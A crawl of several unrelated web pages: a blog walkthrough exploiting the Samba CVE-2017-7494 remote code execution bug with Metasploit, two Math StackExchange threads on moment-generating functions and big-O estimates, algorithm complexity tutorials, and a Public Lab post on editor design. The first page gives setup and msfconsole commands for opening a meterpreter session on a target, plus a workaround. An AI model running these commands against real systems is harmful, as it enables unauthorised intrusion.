http://wikisecure.net/samba-is-known-namedpipe-function-cve-2017-7494-vulnerability/ | It looks like of late a spree of critical bugs are giving many sleepless nights to several product vendors/researchers! WannaCry is still on the verge and not over yet and then came Adylkuzz. While people are busy fixing their network for those, yet another Samba bug came and can have devastating impacts on the end-user. The flaw is triggered while an arbitrary shared library is being loaded which further leads to a nice remote code execution into the target applcation context. The bug is extremely simple to reproduce via a one-liner using Metasploit (as per HD Moore's tweet). Anyways here I would be explaining the method on how to exploit this vulnerability on a standard Ubuntu installation and how you can pop a meterpreter session of the target machine. For reproducing this bug I've used the followings:
- Ubuntu 16.04
- Metasploit Framework
- Exploit Module (https://goo.gl/g6e8OU)
- Samba v4.5.9 (one of the vulnerable version)
Let's have a walk-through on how to exploit this bug using metasploit. After the sequence of few commands, I've shared few images and some attack session packet traces (pcaps). This should be helpful for the security researchers out there to come up with the right protections for their corporate products. Lets's get started..
Setup exploitable samba:
$ssh user@target_ip$cd ~/Desktop
$wget -c "https://download.samba.org/pub/samba/stable/samba-4.5.9.tar.gz"$tar -zxvf samba-4.5.9.tar.gz
$cd samba-4.5.9$./configure && make # You need to install libraries here, if required
$sudo make install #Verify the target version$./bin/smbd -V
#Start the samba listerner (without running as a daemon) with more debug info
# You may choose the smb.conf which is already present inside testdata directory
$sudo ./bin/smbd -i --debuglevel=6 --configfile=./testdata/samba3/smb.conf Run these set of commands on attacker host: $cd ~/metasploit-framework/
$git pull$./msfconsole
use exploit/linux/samba/is_known_pipename
show options
set rhost <target_ip>
exploit
boom!! # Enjoy your popped meterpreter session ;)
Below are some of the exploit run screenshots you can refer as well:
Step 01: Launch msfconsole and choose exploit
Step 02: Check target ip and samba version
Step 03: Start samba listener for expoitation:
Step 04: Set Payload and launch exploit!
Step 05: popped shell (meterpreter) !!
Needless to say, how critical and devastating this bug can be in real world environment. If you don't have a appopritate fix, you can have a temporary workaround by adding the following inside [global] directive (file: smb.conf):
nt pipe support = no
Additionally, there are some ITW Python based proof of concepts. Make sure you have the right vulnerable version along with the patched impacket if you want to reproduce the Python exploit variant.
Packet capture: You can download the packet capture of this attack session for your further analysis from here. This should be helpful for some security researchers out there!
References:
https://isc.sans.edu/diary.html
https://github.com/rapid7/metasploit-framework/pull/8450
https://github.com/omri9741/cve-2017-7494
https://securityonline.info/cve-2017-7494-samba-remote-code-execution-vulnerability/
https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life
Peace!!.. | 2018-03-18 11:41:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.28306275606155396, "perplexity": 7003.075778405543}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257645613.9/warc/CC-MAIN-20180318110736-20180318130736-00307.warc.gz"} |
https://math.stackexchange.com/questions/13589/statistics-moment-generating-function | # statistics - moment-generating function
Let $Y_1,\dots,Y_n$ be independent and identically distributed random variables such that for $0 < p < 1$, $P(Y_i = 1) = p$ and $P(Y_i = 0) = q = 1-p$.
A. Find the moment-generating functions for the random variable $Y_1$.
B. Find the moment-generating functions for $W = Y_1 + \dots + Y_n$.
C. What is the distribution of $W$?
I have started to try A. My book stays that $m(t) = E(e^{tY})$. But i'm sure sure what that is. I think that expected value of $Y_1$ is $p$. But I'm not sure where to go from here. I'm completely clueless, statistics is not my area of expertise(I'm a computer science guy).
If those are the only two values that $Y_i$ takes on then you are correct that $E[Y_i]=p$. The definition of the moment generating function is what you have described as $M_{Y_i}(t)=E[e^{tY_i}]$. So you compute this by multiplying $e^{ty_i}$ by your density function and summing over all of the appropriate values. So in this case $M_{Y_i}(t)=(e^{t(0)})(P(Y_i=0))+(e^{t(1)})(P(Y_i=1))$ which gives you $M_{Y_i}(t)=1-p+pe^t$.
For part B you should use the fact that the moment generating function of a sum of independent random variables is the product of the moment generating functions. That gives you $M_W(t)=(1-p+pe^t)^n$ which i believe is the moment generating function for a Binomial random variable with parameters $p$ and $n$. This makes sense if we do a quick mental check and note that $Y_i$ can be thought of as the success or failure of the $i$th trial, the indicator functions. So the total number of successes would be $W$. | 2020-10-19 15:34:32 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8564131259918213, "perplexity": 38.13905689657798}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107863364.0/warc/CC-MAIN-20201019145901-20201019175901-00572.warc.gz"} |
https://notesformsc.org/tag/computer-science/ | # Algorithm Time Complexity
Given a piece of code, how to determine the complexities without much effort? Each piece of code has a time complexity associated with it which you need to learn. Next time, you see any complex code break it into individual pieces and count the time complexity.
Before you begin, learn the basics of algorithm performance and its complexity.
An algorithm has following types of code and we are going to learn time complexity for each one of them.
1. Statements
2. If-Then-else
3. Loops
4. Nested loops
5. Functions
6. Statements with functions.
## Statements
Each of the statement in an algorithm takes a constant time to execute. If the algorithm procedure has N statements.
Then,
statement 1;
statement 2;
statement 3;
statement n
\begin{aligned}
&Constant \hspace{1mm}time = \mathcal{O}(1)\\ \\
&Total\hspace{1mm} running \hspace{1mm}time = \mathcal{O}(1) + \mathcal{O}(1) + \dots+ \mathcal{O}(1)\\ \\
\end{aligned}
Sum of all the constant times is also a constant.
Therefore,
The Total running time is also constant $\mathcal{O}(1)$.
## If-Then-Else
For the if-then-else block, only one block gets executed, based on the condition. But the run time for the block may be different from other blocks in the if-then-else statement.
if (condition) then
{
block 1;
}
else
{
block2;
}
Therefore,
\begin{aligned}
Total \hspace{1mm}runtime = Max(time(block 1), time(block2));
\end{aligned}
For Example,
Total\hspace{1mm} runtime = Max(\mathcal{O}(1), \mathcal{O}(n))
Depending on the condition the total runtime of if-then-else block could be
\mathcal{O}(1) \hspace{1mm}or\hspace{1mm} \mathcal{O}(n)
## Loops
The loop runs for N time for any given N value. The statements inside the loop also get repeated for N times.
for j = 1 to N do {
statements;
}
The loop runs for N time and each of the statements inside the loop takes $\mathcal{O}(1)$. Then the total runtime is given below.
\begin{aligned}
&Total \hspace{1mm}runtime = N * \mathcal{O}(1)\\
&= \mathcal{O}(N)
\end{aligned}
## Nested Loop
The nested loop is not different than the single loop statement. Now that there are two loops their running time get multiplied.
for i = 1 to N do
{
for j = 1 to M do
{
Statements;
}
}
Suppose the outer loop runs $N$ times and an inner loop has a complexity of $\mathcal{O}(M)$.
Total \hspace{1mm}Time\hspace{1mm} Complexity = \mathcal{O}(N * M)
Let us say that the inner also runs for N times, the total complexity is given by
= \mathcal{O}(N^2)
## Functions
Functions are blocks themselves and contain many other statements. The total time of a function depends on these statements.
Suppose a function $f(N)$ takes $\mathcal{O}(1)$ and there is another function $g(N)$ that has a loop. Then,
Total \hspace{1mm}Time\hspace{1mm} Complexity \hspace{1mm}of \hspace{1mm}g(N) = \mathcal{O}(N)
because of the loop.
## Statements with Function
A loop statement can be inside of a function, but it is also possible that a function is inside of a loop.
for j=1 to N do {
g(N);
}
Since, we already know that the running time of the function $g(N)$ is $\mathcal{O}(N)$.
\begin{aligned}
&Total \hspace{1mm} Complexity = N * \mathcal{O}(N)\\
&= \mathcal{O}(N^2)
\end{aligned}
This is because the loop runs for N time and repeats the function N times as well.
# Algorithms Order Of Growth
The Big O notation, the theta notation and the omega notation are asymptotic notations to measure the order of growth of algorithms when the magnitude of inputs increases.
In the previous article – performance analysis – you learned that algorithm executes in steps and each step takes a “constant time“. You can count the number of steps and then arrive at total computing time required for the algorithm.
## Background
You also learned that complexity affects the performance of the algorithm. These complexities are space complexity and time complexity.
Complexity means how do use of resources usage scale for an algorithm, whereas performance account for actual resources (e.g disk, memory, CPU time) used by algorithms during execution. Complexity affects the performance, performance does not change complexity.
If you leave fixed space like variables, constants etc, and fixed time like compile time, the complexity depends on instance characteristics (operations or steps ) of the algorithm like input size or magnitude.
## What is a suitable method to analyze the algorithm?
When we consider instance characteristics which are the number of operations performed by an algorithm to solve a problem of size n.
You want to analyze three cases.
1. Worst Case Performance
2. Average Case Performance
3. Best Case Performance
Worst Case Performance: given an instance of a problem with the maximum number of operations what is the time required for the algorithm to solve the problem. This is the worst-case analysis for the algorithm.
Average Case Performance: the instance of a problem has the average number of operations that the algorithm needs to solve. The time to complete such operations is the average case analysis of the algorithm.
Best Case Performance: the problem is already in a solved state or needs fewer steps to solve.
While analyzing an algorithm you should be more concerned about the worst case than average or best case. It is better to compare two algorithms based on the worst-case scenario.
## Notations for Complexity
The number of operations for an algorithm when counted will give a function.
For example
an^2+ bn + c
This equation represents an exact step count for an algorithm. You do not need an exact count for the algorithm because when we analyze the algorithm for the worst case, consider only higher-order term and drop the lower order terms because they are insignificant when the input is huge.
therefore,
\begin{aligned}
&an^2 + bn + c\\\\
&becomes\\\\
&O(n^2)
\end{aligned}
This symbol is known as Landau symbol or $Big \hspace{3px} O$ notation named after German mathematician Edmund Landau. It tells us the fastest growing term in the function called the Order or rate of growth. That is why the lower order terms become insignificant and dropped.
The asymptotic notations such as $Big \hspace{3px} O$ is used to describe the running time of the algorithms. There are other notations to describe the running time as well.
Suppose $T(n)$ is the function of the algorithm for input size n,
then running time is given as
T(n) = O(n^2)
## Formal Definition of Big O
Let $f(n)$ and $g(n)$ be two functions, then $\mathcal{O}(g(n))$ is asymptotic upper bound to $f(n)$ for a problem size of n.
For a given function $f(n)$ , the function $\mathcal{O}(g(n))$is a set of functions
\begin{aligned}
&O(g(n)) = f(n) : there \hspace{1mm}exist \hspace{1mm} positive \hspace{1mm}constants \\ \\
&\hspace{1mm}c \hspace{1mm}and \hspace{1mm} n_0 \hspace{1mm} such \hspace{1mm}that \\\\
&0 \leq f(n) \leq cg(n), for \hspace{1mm} all \{n \geq n_0\}\end{aligned}
The graph of the function is given by the following.
## Formal Definition of Theta-Notation
Let $f(n)$ and $g(n)$ be two functions. Then the function $\Theta(n)$ gives asymptotic upper bound and asymptotic lower bound, its means that the function $f(n)$ is “sandwiched” between $c_1 g(n)$ and $c_2 g(n)$
\begin{aligned}
&\theta (g(n)) = f(n) \hspace{1mm} such \hspace{1mm} that \\\\
&there \hspace{1mm} exist \hspace{1mm} positive\hspace{1mm} constants\hspace{1mm} c_1,c_2 \hspace{1mm} and\hspace{1mm} n_0 \hspace{1mm} such\hspace{1mm} that \\\\
&0 \leq c_1g(n) \leq f(n)\leq c_2g(n) for \hspace{1mm} all \{n \geq n_0\}
\end{aligned}
The graph of Theta notation is given below.
## Formal Definition of Omega-Notation
Let $f(n)$ and $g(n)$ be two functions. Then the function $\Omega(n)$ gives asymptotic lower bound, its means that the function $f(n)$ is greater than $cg(n)$.
\begin{aligned}
&\Omega(g(n)) = f(n) :there \hspace{1mm}exists \hspace{1mm}positive \hspace{1mm}constants \hspace{1mm}c and \hspace{1mm} n_0 \hspace{1mm}such \hspace{1mm}that \\ \\
&0 \leq c g(n) \leq f(n) \hspace{1mm}for \hspace{1mm} all \{n \geq n_0\}
\end{aligned}
The graph of Omega notation is given below.
# Algorithms Complexities
Performance analysis of an algorithm is done to understand how efficient that algorithm is compared to another algorithm that solves the same computational problem. Choosing efficient algorithms means computer programmers can write better and efficient programs.
A computer resource is memory and CPU time and performance analysis revolves around these two resources. Two ways to evaluate an algorithm is listed below.
1. Space requirement
2. Computation time
### Space Complexity
The space requirement is related to memory resource needed by the algorithm to solve a computational problem to completion. The program source code has many types of variables and their memory requirements are different. So, you can divide the space requirement into two parts.
Fixed Variables
The fixed part of the program are the instructions, simple variables, constants that does not need much memory and they do not change during execution. They are free from the characteristics of an instance of the computational problem.
Dynamic Variables
The variables depends on input size, pointers that refers to other variables dynamically, stack space for recursion are some example. This type of memory requirement changes with instance of the problem and depends on the instance characteristics. It is given by the following equation.
\begin{aligned}&S(P) = c + SP \\
&where \\
&S(P) \hspace{1mm} is \hspace{1mm}space\hspace{1mm} requirement\\
&c \hspace{1mm}is\hspace{1mm} a \hspace{1mm}constant \\
&SP\hspace{1mm} is\hspace{1mm} the \hspace{1mm}instance \hspace{1mm}characteristics
\end{aligned}
Instance characteristics means that it cannot be determined unless the instance of a problem is running which is related to dynamic memory space. The input size usually has the control over instance of a computational problem.
### Time Complexity
The time complexity is the amount of time required to run the program to completion.It is given by following.
\begin{aligned}&T(P) \hspace{1mm} = compile \hspace{1mm}time\hspace{1mm} +\hspace{1mm} run-time\\
&P\hspace{1mm} is \hspace{1mm}the \hspace{1mm}program.\\
&T(P) \hspace{1mm}is \hspace{1mm}the \hspace{1mm}time\hspace{1mm} complexity \hspace{1mm}of \hspace{1mm}program.\end{aligned}
Program Execution in Steps
The computer executes a program in steps and each step has a time cost associated with it. It means that a step could be done in finite amount of time.See the table below.
You can count the number of steps an algorithm performed using this technique.
For example, consider the following example.
Note:-
\begin{aligned}&
S/e = steps \hspace{1mm}per \hspace{1mm} execution\hspace{1mm} of\hspace{1mm} a \hspace{1mm}statement.\\
&Frequency = The\hspace{1mm} number\hspace{1mm} of\hspace{1mm} times \hspace{1mm}a \hspace{1mm}statement \hspace{1mm}is \hspace{1mm}executed.
\end{aligned}
The result of the step count is $2n + 3$ which is a linear function. The performance analysis begins by counting the steps but count the steps to execute is not the goal. The goal is to find a function that will describe the algorithm in terms of its input size. This function will tell you how the algorithm will perform for different input size and magnitude.
# Algorithms Pseudo Code
In this article, you will learn how to represent an algorithm using a pseudo code and elements of pseudo codes. Learning a programming language is not necessary to understand pseudo code, but knowing a programming language like C, Pascal, etc. help you understand the pseudo codes better.
## Algorithms Components
The algorithm has two part – heading and the body. See the table below for more information.
### Example:
Algorithm Find_Max( A[n])
{
// A[n] is the list of unsorted numbers from which
// we need to find Max value.
max := 0;
for i := i to n do
if max >= A[i] then
{
max := A[i];
}
}
The above is sample algorithm to find max value from a list of numbers. The algorithm is written in pseudo code and contains lot of elements with their own notations.
## Notations
See the table below to understand each notation because you need them for writing algorithms.
# Algorithms
A computer program is clear instructions in a programming language that solve some problem.
You can write this program in different programming languages, but the solution to the problem irrespective of programming language remain the same. Therefore, an algorithm is an independent solution to a computer-based problem.
This tutorial is meant for beginner who are new to algorithms. Some experience with a programming language is sufficient to start learning algorithms, but here are some more information about prerequisites to learn algorithms.
• You must be familiar with basic mathematical concepts such as exponents, set theory, mathematical induction, trees, graphs, relations, limits and so on.
• Some knowledge of programming is recommended such as C/C++ or Java Programming.
You can visit our programming tutorials to learn programming concepts to get comfortable with algorithms.
## Algorithms Tutorial Topics
Here is a list of topics for algorithms. Read from top (easy) to bottom (difficult).
## Recommended Books
Beginners often find algorithms difficult to learn. Algorithms are purely logical and need clear thinking. You must be able to categorize algorithms and recognize which one is suitable for your programming projects one you understand them.
Apart from what you learn in this tutorial, we recommend some books in this section which will help you understand Algorithms in best possible way. We have picked the best books for you.
# Algorithm Introduction
The computer program is a set of basic instructions to computer hardware. The computer hardware executes the instruction to carry out some tasks. The computer program is written using a blueprint called an algorithm. Each step in an algorithm has a clear meaning and performs a specific task.
An algorithm is any well-defined computational procedure that transforms one or more input values into one or more output values. Algorithms solve computational problems in a step-by-step manner.
For example, given a set of unsorted numbers as input, a sorting algorithm can sort the numbers in ascending or descending order as output.
\begin{aligned}
&Unsorted \hspace{1mm}set\\
&\{ 2, 3, 5, 1, 8, 4, 7, 6\} \\ \\
&Sorted \hspace{1mm}list \hspace{1mm}solved \hspace{1mm}by \hspace{1mm}sorting \hspace{1mm}algorithm\\
&\{1, 2, 3, 4, 5, 6, 7, 8 \}
\end{aligned}
### Characteristics of an Algorithm
Algorithms have some common characteristics that separate them from computer programs. A computer program implements the algorithm to solve a computer-based problem, but the reverse is not true.
• Inputs
• Output
• Definiteness and Unambiguous
• Finiteness
• Effectiveness
Input
An algorithm needs zero or more input values to compute the outputs. The size of the input values can be different for each instance of a problem solved by the algorithm.
Certain algorithms require that you place constraints on the input values. For example, an algorithm may need only positive integers values, the negative values are not allowed.
Output
An algorithm processes the inputs and produces the desired output. The correct algorithm will always produce correct outputs for a computation problem.
Sometimes the output is a single value and sometimes it is an array of quantities.
Definiteness and Unambiguous
The algorithm must do definite operations or tasks that result in intermediate or final output. All procedures must contain unambiguous operations. If not, then the algorithm may not terminate or produce the wrong output and violate the finiteness characteristic or becomes an incorrect algorithm.
Finiteness
Finiteness means “having limits”. Every algorithm must end after a finite number of steps. It does not mean that an algorithm can take 100 steps to solve a problem because then you would not call that algorithm efficient.
An algorithm that terminates after reasonably finite steps maintains the finiteness characteristic.
Effectiveness
The algorithm must perform basic operations that can be done using a pen or pencil on a piece of paper. This is called the effectiveness of the algorithm.
### How to Represent an Algorithm?
Representing algorithm depends on the context. When you are writing a new algorithm then writing steps in plain English is suitable. The best way to represent an algorithm when writing a program is using a flowchart.
Three ways to represent an algorithm are
1. Language ( e.g English)
2. Flowcharts
3. Pseudo Code (e.g C, C++)
Algorithms in this tutorial are written in pseudo codes.The pseudo codes are inspired by programming languages like C, but they are not executable codes. Instead a mere representation of algorithm. | 2023-02-04 03:20:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 30, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6165331602096558, "perplexity": 1125.2620505549112}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500080.82/warc/CC-MAIN-20230204012622-20230204042622-00580.warc.gz"} |
https://i.publiclab.org/notes/warren/04-29-2016/early-design-ideas-for-the-rich-editor-project | # Early design ideas for the Rich Editor project
by warren | 29 Apr 18:43
There've been LOTS of great ideas posted, both in response to my recent ask for input on the new Rich Editor project, and in response to @liz's post on peer review -- that have relevance to the ongoing design of the new Rich Editor.
There's really too much to tackle all at once, but I've been working on sketching a number of ideas for designs and/or features that I wanted to put out there, especially in advance of Monday's OpenHour on Public Lab's research culture.
Here's the big sketch, which covers a lot of different ideas:
Keep in mind, as always this early in the design process, that this is more about layout, flow, and features, than about graphic design or typography specifics. Let me walk through a few of these
## Step-wise authoring
As we add new features and make the Editor more powerful, we add complexity. We can use design to "stage" this complexity, so that more advanced features are available, but aren't cluttering the display for newer authors who might be overwhelmed.
Organizing the Editor by clearly-separated steps helps situate each feature in the overall process, though they take more space to display in steps. But steps can also have helpful guidance and tips that doesn't all run together into a big block of text the way it does in our current editor.
## "Type" selector
There are already a few types of post -- events and questions vs. basic research notes -- and we've talked about making one specific to the blog, or for other uses. A type selector could display a different "flavor" of the Editor for different purposes, and could also be used to categorize posts a bit, if we wanted: "exploratory" posts vs. "data analysis" or "narrative" ones, though we'd have to figure out how to clearly refer to these different types.
## A text area that grows
The text area that you type the body of your note into will be a WYSIWYG (what you see is what you get) "rich text" editor, of course. But one improvement over the current one is that it could scale vertically to accommodate your text. As you type, there's more space in the left column, so we could display additional tips, perhaps relevant to someone authoring a longer piece -- including encouraging them to break it up into a series of posts (we can explore better ways to present a series of posts, too).
## Inviting others into your work
One big priority is to provide some tools for authors to build collaborations -- from asking others for help, to proposing that others replicate work, to soliciting review of a draft.
There are suggestions of this throughout the mockup, but one big one is the "I'd like feedback/help on X" selector next to the Publish button. The options in it are just a few suggestions -- chime in if you have your own -- but the idea would be to specifically ask for interaction from your readers.
## Miscellaneous
The mockup also includes lots of small feature ideas -- note the suggested placement of auto-saved "drafts," the "suggested tags" and the "recent tags" drawn from your own recent posts (or tags you've followed, perhaps).
## Feedback welcome
Of course, this doesn't begin to cover all the various needs and use cases the Editor will have to address, but it's an early exercise to see how it might integrate into an overall design.
I'm curious -- what do people think of this basic layout:
• in terms of approchability
• is there too much information? Too little?
• how it would read to newcomers vs. long-time contributors?
Thanks in advance for your thoughts and suggestions as this design process moves forward!
Looks like a good starting point. For the moment, I'd first suggest incorporating some form of sub-topic list for the 'Body/Content' section which might have a different set for each general category. By this I mean that the selector for note/question/event/etc would each prompt an appropriate set of sub-sections in the body to be covered. A research note would require a different set than an announcement of an event. I acknowledge the existing Note format includes a few suggested questions to answer, but at least in the case of research, that list is insufficient and authors appear to need more guidance. Other types of submissions can have parallel missing material.
Thanks for the input, Dave.
I had another idea -- we've talked about asking for things after someone presses publish (like, for example, tagging) to reduce the upfront requirements and present a simpler form.
Some of these could go at the head or foot of the note itself, once published. Like "now, invite others to reproduce your work -- be sure youve provided a materials list and instructions" or "add this to a series of recent research" or "mark this as an open challenge" or whatever.
Yes, procedurally (for the form) reminders are generally easy. However, I'd suggest (or remind ;-) ) that such action items would mandate that each have some web functionality to back it up. For instance, 'add to series of research' would 1) still require the submit process and 2) there would have to be some form of 'note series linking' in existence.
Help with tagging is fine, but it is frequently either ignored or abused rather badly by some so I'd suggest 1) the tagging process needs to be redesigned and 2) if tagging is to be used at all, existing note tags need to be cleaned up. I realize this is a bit drastic, but maybe #2 could be initially automated a bit -- do an automated search of all existing notes and compare words used in the body of the note to words in the tags and remove all but the top 5 matching tags. For notes with no tags, the same process could add 3 tags based on the same word predominance within the body text.
I think being able to explicitly save and return to drafts, invite others to collaborate are my priority features here. What do you think about saving a "shared" draft such that more than one person can work on drafting/editing a note? Right now multiple authors can be tagged but only one can edit. Can the invitation to share a draft include an invitation to edit?
The Stepwise editing that gives a 'template' for a post is helpful now, I like that it will be expanded to have event/question framings too.
Is this a question? Click here to post it to the Questions page.
We have two distinct ideas of "draft" which I want to try to reconcile -- one is to simply publish a post normally, but it'd be marked "draft" (kind of like a preprint preview on arXiv or something):
• it'd show up in the normal feed (we could offer option to filter)
• it might specifically list input requested
Another is one which is not published, or not visible to anyone except those allowed by original author.
• it might be more complex since we might have to include notifications, tighter access restrictions
In either case, we could make the final publication date distinct from the draft publication date. I like the model of A better, but curious it'd meet the needs of the B scenario too, or if they're really quite distinct?
In any case, we can add multiple author access using the with:coauthor tag.
Re: edit history, the faster way to complete it would be to store drafts in the browser localStorage, but this would mean you could not begin editing on a phone, then pick up on a laptop (a use case I'd really like, for adding images from my phone, but authoring on my laptop). So I have to consider whether a server-side edit history is possible (and worthwhile) in our timeframe. Another solution to this would be to have a "recent images" selector so it doesn't matter if you're editing the same draft, you can upload from your phone no matter what, and see images uploaded from any source when placing them.
Is this a question? Click here to post it to the Questions page.
At the Open Hour today, we brainstormed allowing users to flag a post with "the information in this post has been superceded by a newer research note" and submit a link to the newer note.
In this way historical info can be preserved, new users can find up to date procedures, and new users and other editors can help in the co-creation of organization :D
Jeff, I'd like to suggest that 'notes' have generally taken the form of either 1) "completed" sets of information or 2) focused topics of "open-ended" inquiry. One might find another basic form as well; however, all could likely be served by the same basic tools.
In #1, the work has largely been completed so the submission is mostly a process of careful documentation; the 'draft' is the pre-publish stage and the final doc requires review.. In #2, the work starts by publishing the 'draft' which forms the kernel of an in determinant project and is never classified as reviewed. A type #2 document might, but is not required to, end in a separate type #1 document being submitted. Type #2 remains a 'draft'; just one which has evolved. Either type could be singular or collaborative but #1's tend to be singular and #2's tend to be collaborative.
The above is describing the structure of each 'root' PLab 'field of interest'; which should be pre-defined because there's a small, finite number of them -- eg. Mapping, IR, Water, Air, Spectrometry, Oil, etc. This strongly suggests that while one PLab page might show all submitted notes (it's just one cross-sectional view of all notes - latest first for easy review), that is only a programatic view of the site which contains separate categories for each area of interest. Selecting a root topic therefore filters out most of the obviously un-related material which simplifies topic search. Yes, a programatic view option of search could provide related material.
Hi, all - I'll probably post another set of sketches on this soon, but a few followup ideas:
### Research note sequences
I've mentioned this before, but the idea would be that you could mark your post as a certain portion of the research, and the published note page would prompt you to (and/or others) to continue the sequence of posts with the "next step" which could be determined from the step you marked this one with.
### Connect to other work
A small search form to search for and link to other work this relates to, to better interlink posts.
### Charts
A way to input some data in fences (like code) but that would form a graph, maybe like this:
chart | 2022-05-27 16:42:20 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.35136333107948303, "perplexity": 1669.3441422230303}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662658761.95/warc/CC-MAIN-20220527142854-20220527172854-00415.warc.gz"} |
https://math.stackexchange.com/questions/1292626/confusion-with-o-function | # Confusion with $O$ function
I read this identity in lecture notes and need help understand ing the $O$ function
$$\sum_{1\leq d\leq x}\mu(d)\cdot \frac{1}{2}\left\lfloor\frac xd\right\rfloor\left(\left\lfloor\frac xd\right\rfloor+1\right)=\sum_{1\leq d\leq x}\mu(d)\left(\frac{x^2}{2d^2}+O(x/d)\right)$$
Attempt: This implies
$$\frac{1}{2}\left\lfloor\frac xd\right\rfloor\left(\left\lfloor\frac xd\right\rfloor+1\right)=\frac{x^2}{2d^2}+O(x/d)$$
From the definition of $\left\lfloor\theta\right\rfloor$ being the greatest integer not exceeding $\theta$
I can see that $\left\lfloor\frac xd\right\rfloor=x/d+O(1)$,
But substituting this in cannot lead to an expression with $O(x/d)$, where does this come from?
How do I derive this expression
• Um, what? What is $c$? And $O$ is used for estimation, but what you've stated is an exact equality. You'd pretty much never us $O$ in a proof of an equality, unless the equality included limits. – Thomas Andrews May 21 '15 at 12:34
• Corrected the 'c' part – Sam Houston May 21 '15 at 12:38
• Also, the limits are set by the summation sign – Sam Houston May 21 '15 at 12:39
Let's realize what you really want is:
$$\lfloor y\rfloor (\lfloor y\rfloor +1)=y^2+O(y)$$
Let $f(y)=y(y+1)$. Then $f(y)-f(\lfloor y\rfloor) = f'(z) (y-\lfloor y\rfloor)$ for some $z\in [\lfloor y\rfloor, y]\subseteq (y-1,y]$.
But $f'(z)=2z+1$ so $f'(z)= O(y)$ when $z\in (y-1,y]$, and $0\leq y-\lfloor y\rfloor <1$, so $f(y)-f(\lfloor y\rfloor) = O(y)$ and $f(y)=y^2+O(y)$.
So $$f(\lfloor y\rfloor)=f(y)-(f(y)-f(\lfloor y\rfloor) = y^2 + O(y) - O(y)= y^2+O(y).$$
$$\frac{1}{2}[x/d]([x/d]+1)=\frac12\left(\frac xd+O(1)+1\right)\left(\frac xd+O(1)\right)=\frac{x^2}{2d^2}+\frac xdO(1)+O'(1)\\ =\frac{x^2}{2d^2}+O''\left(\frac xd\right).$$
• Could you elaborate on the last equality please, still confused by that, what is the realationship betweeen $O(1)$ and $O(x/d)$ – Sam Houston May 21 '15 at 12:42
• Do you know the big-$O$ notation ? – Yves Daoust May 21 '15 at 12:43
